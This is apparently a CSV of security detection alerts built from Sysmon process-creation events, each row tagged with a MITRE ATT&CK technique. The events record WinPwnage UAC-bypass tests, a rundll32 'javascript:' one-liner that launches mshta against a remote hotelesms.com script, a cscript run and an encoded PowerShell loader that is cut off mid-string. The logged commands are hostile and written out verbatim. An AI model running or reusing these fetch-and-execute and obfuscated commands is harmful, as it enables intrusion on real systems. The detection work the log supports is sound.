"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:30:46.400506Z"">
</TimeCreated>
<EventRecordID>16388</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:30:46.213</Data>
<Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
<Data Name=""ProcessId"">2960</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1FF8-5CD8-0000-00102A342000</Data>
<Data Name=""ParentProcessId"">1332</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:30:46.400506Z"">
</TimeCreated>
<EventRecordID>16388</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:30:46.213</Data>
<Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
<Data Name=""ProcessId"">2960</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1FF8-5CD8-0000-00102A342000</Data>
<Data Name=""ParentProcessId"">1332</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.867089Z"">
</TimeCreated>
<EventRecordID>4127</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.837</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.867089Z"">
</TimeCreated>
<EventRecordID>4127</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.837</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.867089Z"">
</TimeCreated>
<EventRecordID>4127</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.837</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:56:12.652868Z"">
</TimeCreated>
<EventRecordID>16438</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:56:12.485</Data>
<Data Name=""ProcessGuid"">365ABB72-25FC-5CD8-0000-0010906A1300</Data>
<Data Name=""ProcessId"">2168</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-25EC-5CD8-0000-0010CB0A1000</Data>
<Data Name=""ParentProcessId"">684</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1634833622.319552,2021-10-21T20:27:02.319552+04:00,,Threat,High,"Found User (LAPTOP-JU4M3I0E\bouss) Trying to run wscript or cscript with Command Line (cscript.exe //e:jscript testme.js) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\System32\cmd.exe&quot;) in directory : ( C:\Users\bouss\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-10-21T16:27:02.319552Z"">
</TimeCreated>
<EventRecordID>10920364</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5396"" ThreadID=""7692"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-10-21 16:27:02.278</Data>
<Data Name=""ProcessGuid"">00247C92-94D6-6171-0000-00100514967B</Data>
<Data Name=""ProcessId"">28176</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">cscript.exe</Data>
<Data Name=""CommandLine"">cscript.exe //e:jscript testme.js</Data>
<Data Name=""CurrentDirectory"">C:\Users\bouss\Desktop\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-3C1A-6169-0000-0020C2790700</Data>
<Data Name=""LogonId"">0x779c2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=C3D511D4CF77C50D00A5264C6BB3AE44E5008831,MD5=B8454647EFC71192BF7B1572D18F7BD8,SHA256=C69648B049E35FF96523C911737A0481D52DD06508A561094A4FA895A30A6535,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">00247C92-85C9-6170-0000-001008E62B6B</Data>
<Data Name=""ParentProcessId"">24148</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:56:12.652868Z"">
</TimeCreated>
<EventRecordID>16438</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:56:12.485</Data>
<Data Name=""ProcessGuid"">365ABB72-25FC-5CD8-0000-0010906A1300</Data>
<Data Name=""ProcessId"">2168</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-25EC-5CD8-0000-0010CB0A1000</Data>
<Data Name=""ParentProcessId"">684</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.662701,2019-05-27T05:29:18.662701+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;. )&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.662701Z"">
</TimeCreated>
<EventRecordID>5931</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.622</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010EF9EFF00</Data>
<Data Name=""ProcessId"">3756</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;. )&quot; /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AY